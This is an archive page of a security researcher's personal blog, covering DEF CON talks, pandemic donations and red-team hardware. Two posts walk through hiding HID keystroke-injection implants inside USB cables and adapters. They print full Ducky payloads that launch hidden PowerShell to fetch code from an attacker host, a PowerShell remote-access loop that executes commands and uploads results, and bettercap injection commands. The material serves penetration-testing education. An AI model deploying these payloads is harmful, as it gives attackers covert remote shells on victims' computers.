David Sopas

hacker, father, tinker

David Sopas – Web Security Researcher
START READING
10/08/20 Meetings , My Events # , ,

Our DEF CON 28 day was a blast

Our DEF CON 28 day was a blast

4 portuguese security researchers presented at DEF CON this year. I’m sure that was a record 🙂

  • Paulo Silva and I with API (in)Security TOP 10: Guided tour to the Wild Wild World of APIs (which you can check the recording on Youtube).
  • Pedro Umbelino and João Morais with Android Bug Foraging (check the talk on Youtube)

With this in our mind, we gathered together at Char49 meeting room and saw it together… with drinks and pizza.

The fun was just starting. On Pedro and João talk, they included a never shown video  before regarding Google Camera issue which included myself being a victim of this vulnerability.

We even did the CONs tradition of “Shoot the N00b” for first time speakers – drink a shot before the talk. The poison was Pedro Umbelinos’ homemade firewater. I would lie if I would say that it didn’t hurt going down 🙂

In the end we had lot of fun and I hop enext year we can be together again giving a talk at DEF CON. Who knows?

PS: A new entry on my bucket list can now be checked – be a speaker at DEF CON.

 

no responses
30/07/20 Meetings , My Events # , , ,

DEF CON 28 here I go

Even in safemode, DEF CON 28 will be legendary, specially because for the first time… I’ll be a speaker 🙂
Some of my research was already present at DEF CON but now I’ll be actually speaking at the best security event in the world.

Paulo Silva and I will be talking about API (in)Security TOP 10: Guided tour to the Wild Wild World of APIs at AppSec Village and you can’t miss it.

Check out the agenda and don’t forget also to check Android Bug Foraging from my mates Pedro Umbelino and João Morais.

 

no responses
30/07/20 Donations # , , ,

A small gesture on this pandemic times

Since the middle of April, I decided to help health professionals, firefighters and all the people who were in the frontline against COVID-19 with 3D printed visors and ear-savers.
After a while the scope had a wide range which any people could ask for this type of protections and in exchange they would offer goods which later would be distributed between local associations.

Sharing is caring right? And why not?

In total I printed on my 3D printer 684 objects:

  • 364 visors
  • 251 ear-savers
  • 19 multi-tools
  • 47 mask carriers

In returned I distributed more than 1200 units of goods.

  • 266 L of milk
  • 213 children diapers
  • 91 tuna cans
  • 85 kilos of pasta
  • 76 eggs

And many other products.

I tried to help as much as possible, specially associations that helped out families with children.
I thought for a while if I would post this but after talking with some people, they told me, why not… Maybe someone will catch the idea and do the same in other locations.

So if you want to start, ping me on Twitter.

no responses
04/03/20 My Events # , , ,

Speaker at ENEI2020

Speaker at ENEI2020

Last wednesday I gave a talk at ENEI2020 with the topic – “Do I need a hoodie to hack a bank?”. It was focused on a red-team assessment I did and it was to show computer students a little bit about security, specially:

  • Recon
  • Social Engineering
  • Implants
  • Dead-drops

It was quite interesting because I got a lot of good feedback from the audience.
I hope they liked it.

no responses
27/12/19 Hardware , Tips and Tricks # , , , , , ,

Gone in 30 seconds – a HID cable story tale

Gone in 30 seconds – a HID cable story tale

Following what I mentioned in my previous post, I went to my electronics bin and gathered a Logitech Wireless mouse (M185) and a USB cable.

On the mouse, I took the receiver – a Logitech Unifying Receiver CU0010 (nRF24L family):

And cut one of the sides of a random USB cable:

Split the wires:

Removed the cap from the Logitech receiver:

Solder (really need to improve my soldering skills) the wires (GND, Data+, Data- and VCC) into the receiver:

Put the USB connector cap on:

Add a nice plastic USB enclosure to make it more real:

All the process was fast, I took around 5 minutes to cut, solder and super-glue all together. In the end I think it could be better, specially when I rammed the USB connector with a knife.

For the second part it took a little more because I wanted to use another alternative to the existing HID cables – so I went with CrazyRadio + Bastille firmware and a final touch of bettercap HID module to send my Ducky payload. I wanted to take advantage of what I had and that’s it.

This is basically a walkthrough of what I did:

  • Write down the MAC address of the device (using HID.recon from bettercap or by checking the properties of the device – this will depend on your OS)
  • Write your Ducky payload – in this PoC is just a reverse shell to my VPS
DELAY 750
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass -W hidden "IEX (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/ps.txt')"
ENTER
DELAY 750
function getUser() {
    $string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
    $string = $string.Trim()
    return $string
}
 
function getComputerName() {
    $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
    $string = $string.Trim()
    return $string
}
 
$resp = "http://ATTACKER_IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
    $r_get = $w.DownloadString($resp)
    $d = [System.Convert]::FromBase64String($r_get);
    $Ds = [System.Text.Encoding]::UTF8.GetString($d);
 
    while($r_get) {
        $output = invoke-expression $Ds | out-string
        $w.UploadString($resp, $output)
        break
    }
}
  • Connect the HID cable on the Windows victim machine (don’t forget that the payload will be OS dependable)
  • Start your listener on the attacker machine
  • Connect CrazyRadio and start bettercap
bettercap -eval="hid.recon on"
hid.inject MAC PT ducky.txt

And its basically game-over.
I did a short video to illustrate the PoC – https://www.youtube.com/watch?v=y9C-4bcgmIU.

In the process of creating this HID cable with “leftovers” I learn a few things:

  • Some Logitech Unifying receivers are not vulnerable to some known attacks – like keystroke injection;
  • Be careful when putting solder on the USB contacts. Just put a small amount and spread it slightly with your iron, that way the PCB will fit better on the USB connector;
  • Do a first run on a USB hub just to make sure you don’t burn your laptop port or something;
  • Don’t waste money buying expensive HID cables (specially when ripped from others) when you can make your own for less that $10;
  • Last point, don’t keep your brain focused on doing what others do and don’t be afraid do fail at first. Be persistent and never quit.
no responses
19/12/19 Hardware , Tips and Tricks # , , , , ,

Make HID great again

Since ever I’ve been using HID devices on red-team assessments at Char49 – specially using Rubber Ducky and latelly with Cactus WHID.
I wanted to play a little more so I’ve picked one of my favourite tools from my arsenal which is the tiny Digispark. This ATTINY85 with 8kb flash memory – became part of most of my assessments. From deap-drops to implants.

My last implant – we can call it HID modding – was to add a Digispark inside a damaged Wireless Adapter. The only components that I left from the original product was the USB connector and the external case.
Before connecting everything, I did a test lab using a old USB connector and the Digipark with soldered pins.

Why? In the past I did found bad PCB prints that misplaced DATA+ with the DATA- (in the Digispark is USB+ and USB-) so before using my shitty soldering skills I created the setup for future HID modding.

I ended up with the following schematics:

Everything was working properly so I added everything inside the Wireless Adapter and used super-glue to close the case.

Now I had a concealed HID device that I can put on a client and make him think is just an innocent network device.

The only part missing is the code. I connected the device to Arduino IDE and uploaded my sketch – which will do the following:

  1. Download a file from my domain using powershell
  2. Execute the ps1 file
  3. Get the reverse shell which pointed to my VPS

Ducky payload (I used duck2spark from mame82 to convert my duck scripts to digispark source):

DELAY 750
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://YOUR-IP/ps.txt',\"file.ps1\")";
ENTER
DELAY 750
STRING cls
ENTER
DELAY 500
STRING powershell -W Hidden .\file.ps1
ENTER

Powershell script:

function getUser() {
	$string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
    $string = $string.Trim()
    return $string
}

function getComputerName() {
    $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
    $string = $string.Trim()
    return $string
}

$resp = "http://YOUR-IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
	[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
	$r_get = $w.DownloadString($resp)
    $d = [System.Convert]::FromBase64String($r_get);
    $Ds = [System.Text.Encoding]::UTF8.GetString($d);

	while($r_get) {
		$output = invoke-expression $Ds | out-string
		$w.UploadString($resp, $output)
		break
	}
}

I created a small video for educational purposes only – find it here.

The target machine was a fresh and up-to-date Windows 10 Pro install with Windows Defender and Firewall on.

How much did it cost?

Well the only thing was really the Digispark which you can get on Aliexpress for 1 to 3 bucks a piece.

I already have other ideas, like adding Digispark on other “junk” that I have on my “crappy stuff that I should recycle” – RC toys, USB convertors, IP cameras, etc.

To conclude this post, I recently bought Evil Crow Cable and O.MG DemonSeed EDU so I hope to have time to explore these devices.

To learn more about HID, you should follow these talented guys on Twitter – @mame82, @lucabongiorni and @_MG_.
Also I recommend everyone to see the talk from my mate @kripthor regarding the steps on creating UberHid.

Any feedback feel free to ping me on Twitter – @dsopas.

 

 

no responses
23/08/19 Hardware , Tools , Travel # , , ,

My Red Team assessment hardware

My Red Team assessment hardware

Many friends and colleagues are asking me what I use for red team assessments so I decided to write a post with my arsenal – which will could not reflect others Red Team approach.

Also, the hardware is task specific. For example, if you’re going on a Wifi hunt you might not need a set of lockpicking tools – well you never know 🙂

Other people lists can be found here:

Feel free to Tweet @dsopas with new lists or even recommend stuff for me to buy 🙂

no responses
22/08/19 Hardware # , ,

Pointer hijack and portapack testing

When I was in Casa das Artes – venue for an event that I would give a talk – I was discussing some RF topics with my pal Zezadas. One of them was to play with RF pointers… I went home the next day and did a small prank which involved the hackrf replay of a windows (works in 7 or 10) shutdown – video -> here!

If you want to have real fun with pointers – check our mame82 LOGITracker research.

BUT not happy with that, I finally got a portapack for “portability” of hackrf. What should be the first video for showing off portapack? My cat’s RF mouse 😀

Video? -> here!

no responses
22/08/19 Interesting Readings # , ,

Checkmarx Security Research Team latest work

We’ve got a lot of new research in our hands but so far only one got disclosed to the public.

I’m talking about the LeapFrog LeapPad Ultimate research. It got a few hits on the media (CNET, The TelegraphZDNET, BleepingComputerThreatpost, Fortune, …) and I’m very proud of this work specially because it keeps children more secure.

You can see a small PoC video here and the full research at the Checkmarx blog.

no responses
1 2 3 4 11